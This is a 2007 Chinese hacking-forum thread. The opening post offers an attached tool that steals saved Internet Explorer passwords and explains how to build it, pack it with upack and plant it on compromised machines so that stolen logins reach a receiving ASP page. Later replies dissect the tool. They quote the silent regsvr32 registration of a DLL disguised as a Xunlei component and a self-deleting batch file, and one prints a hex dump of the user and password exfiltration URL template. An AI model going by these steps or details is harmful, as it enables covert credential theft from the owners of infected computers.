打印

[原创]抛一个获取IE密码小工具也许渗透时用得着

xiao2004

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 452
精华: 16
积分: 1740
阅读权限: 100
性别: 男
在线时间: 221 小时
注册时间: 2005-3-19
最后登录: 2008-7-2

发短消息
加为好友
当前离线

楼主大中小发表于 2007-3-11 22:03 只看该作者

[原创]抛一个获取IE密码小工具也许渗透时用得着

软件作者：xiao2004
文章来源：邪恶八进制信息安全团队（www.eviloctal.com）

费话不多说,这是一个利用Com来获取IE密码的工具,应该要比键盘记录爽点.
用CreateExe.exe生出exe程序后用upack压一下,大概是29K的样子,test.asp为接收文件
90%的网站都能搞定,搞到肉鸡时,给他放一个,说不定能有所收获,什么网站后台呀,邮箱呀,或者是他的马马哦...

这一版先到这,接下来是捕获应用软件的密码,向密码解霸看齐了...

附件

IE.rar (56 KB): 2007-3-11 22:03, 下载次数: 588

TOP

sniper

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 92
精华: 4
积分: 3212
阅读权限: 100
在线时间: 106 小时
注册时间: 2004-11-26
最后登录: 2008-5-5

发短消息
加为好友
当前离线

沙发大中小发表于 2007-3-11 23:35 只看该作者

生成好的文件捆绑检查：
开始分析...
文件位置：C:\Documents and Settings\Administrator\桌面\IE\sss.exe
文件长度：114689Byte(s)

文件头部分析...
可执行头部数：2个
文件可能经过捆绑，请小心使用！

分析全部结束

why？

TOP

ni7wo3

晶莹剔透§烈日灼然

Rank: 1

帖子: 9
精华: 0
积分: 34
阅读权限: 40
在线时间: 14 小时
注册时间: 2005-6-18
最后登录: 2008-1-5

发短消息
加为好友
当前离线

椅子大中小发表于 2007-3-12 00:41 只看该作者

引用:

引用第3楼sniper于2007-03-11 23:35发表的 :
生成好的文件捆绑检查：
开始分析...
文件位置：C:Documents and SettingsAdministrator桌面IEsss.exe
文件长度：114689Byte(s)

.......

他这个生成器　资源文件里应该有个等待配置的ＥＸＥ资源
２个文件头正常．

TOP

zhouzhen

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T核心成员 COO

帖子: 480
精华: 51
积分: 6400
阅读权限: 255
性别: 男
在线时间: 820 小时
注册时间: 2004-11-11
最后登录: 2008-7-2

原创技术奖核心建议奖优秀管理奖软件研发奖

发短消息
加为好友
当前离线

板凳大中小发表于 2007-3-12 15:26 只看该作者

应该不是什么木马程序。。

我看了下。释放出了两个文件。一个是cmdd.bat 一个是 XunLeiBHO_001.dll

regsvr32 /c /s XunLeiBHO_001.dll
winexec cmdd.bat

cmdd.bat 实现自删除。

附件

XunLeiBHO_001.rar (23 KB): 2007-3-12 15:26, 下载次数: 45

cmdd.rar (1 KB): 2007-3-12 15:26, 下载次数: 43

安全就象毒品一样，上瘾了就戒不掉了 http://www.6code.net

TOP

xiao2004

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 452
精华: 16
积分: 1740
阅读权限: 100
性别: 男
在线时间: 221 小时
注册时间: 2005-3-19
最后登录: 2008-7-2

发短消息
加为好友
当前离线

地板大中小发表于 2007-3-12 18:01 只看该作者

引用:

引用第1楼sniper于2007-03-11 23:35发表的 :
生成好的文件捆绑检查：
开始分析...
文件位置：C:Documents and SettingsAdministrator桌面IEsss.exe
文件长度：114689Byte(s)

.......

真是搞笑,你认为软件的作者如果真要加后门,还需要做捆绑吗?

TOP

bigwahaha

晶莹剔透§烈日灼然

Rank: 1

帖子: 26
精华: 0
积分: 93
阅读权限: 40
性别: 男
在线时间: 89 小时
注册时间: 2007-1-10
最后登录: 2008-6-7

发短消息
加为好友
当前离线

6楼大中小发表于 2007-3-12 18:55 只看该作者

引用:

引用第4楼zhouzhen于2007-03-12 15:26发表的 :
应该不是什么木马程序。。

我看了下。释放出了两个文件。一个是cmdd.bat 一个是 XunLeiBHO_001.dll

regsvr32 /c /s XunLeiBHO_001.dll
.......

XunLeiBHO_001.dll就是木马啊...试图伪装成迅雷的DLL;用OD载入随便看一下就知道了...

TOP

dayang1718

晶莹剔透§烈日灼然

Rank: 1

帖子: 80
精华: 0
积分: 271
阅读权限: 40
性别: 男
来自: shandong
在线时间: 85 小时
注册时间: 2006-10-7
最后登录: 2008-7-4

发短消息
加为好友
当前离线

7楼大中小发表于 2007-3-12 19:42 只看该作者

不知道作者是用的什么加壳工具？生成的文件根本没后
   .%s?u
  ser=%s&pass=%s&p
ass1=%s&title=%s
  &url=%s.Wininet.
dll.IEXPLORE.EXE
  "%s?user=.....
. %s&pass=%s&pas
000153B0  73 31 3D 25 73 26 74 69 74 6C 65 3D 25 73 26 75  s1=%s&title=%s&u
000153C0  72 6C 3D 25 73 22 00 00             rl=%s"..门请大家放心！在这里小弟请教一下是什么意思？真正连接的url是http://xxx.com/test.asp后面跟的参数具体是什么？

love hack